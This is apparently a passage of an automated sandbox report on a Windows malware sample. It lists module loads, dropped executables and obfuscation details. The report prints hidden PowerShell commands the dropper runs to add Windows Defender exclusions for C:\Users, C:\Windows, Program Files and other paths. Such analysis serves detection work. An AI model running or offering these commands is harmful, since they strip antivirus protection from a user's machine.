Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Reka\rapnewsa.exeSection loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exeSection loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exeSection loaded: webio.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exeSection loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exeSection loaded: schannel.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mskeyprotect.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exeSection loaded: gpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: windows.storage.dll
Source: C:\Reka\rapnewsa.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: UBONg7lmVR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UBONg7lmVR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: UBONg7lmVR.exeStatic file information: File size 52506624 > 1048576
Source: UBONg7lmVR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3211200
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: UBONg7lmVR.exeStatic PE information: 0xBB347EF2 [Thu Jul 11 14:49:22 2069 UTC]
Source: C:\Reka\rapnewsa.exeCode function: 23_2_002C17E0 GlobalHandle,LoadLibraryA,GetProcAddress,23_2_002C17E0
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: .xdata
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /4
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /19
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /32
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /46
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /65
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /78
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: /90
Source: y5cm2yzz.hwt.exe.0.drStatic PE information: section name: .symtab
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44FA0 push eax; retf 0070h0_2_05B44FAA
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44F8F push eax; retf 0070h0_2_05B44F9A
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05B44F62 push eax; retf 0070h0_2_05B44F8A
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_05BDF0B0 pushfd ; ret 0_2_05BDF0B1
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_09851E40 push es; ret 0_2_09851E3F
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0985A317 pushad ; retf 0_2_0985A325
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0989FDD8 pushfd ; retf 0_2_0989FDD9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD1BB40 pushfd ; retf 0_2_0AD1BB55
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD14EE0 push es; ret 0_2_0AD14EF5
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD14F00 push es; ret 0_2_0AD14F35
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD11D08 push es; ret 0_2_0AD11D16
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD106E1 pushfd ; iretd 0_2_0AD106F9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0AD1A7F0 pushfd ; retf 0_2_0AD1A7F9
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3AAFD8 push eax; ret 0_2_0B3AB271
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_0B3AB268 pushad ; ret 0_2_0B3AB269
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile created: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeFile created: C:\Reka\rapnewsa.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\UBONg7lmVR.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
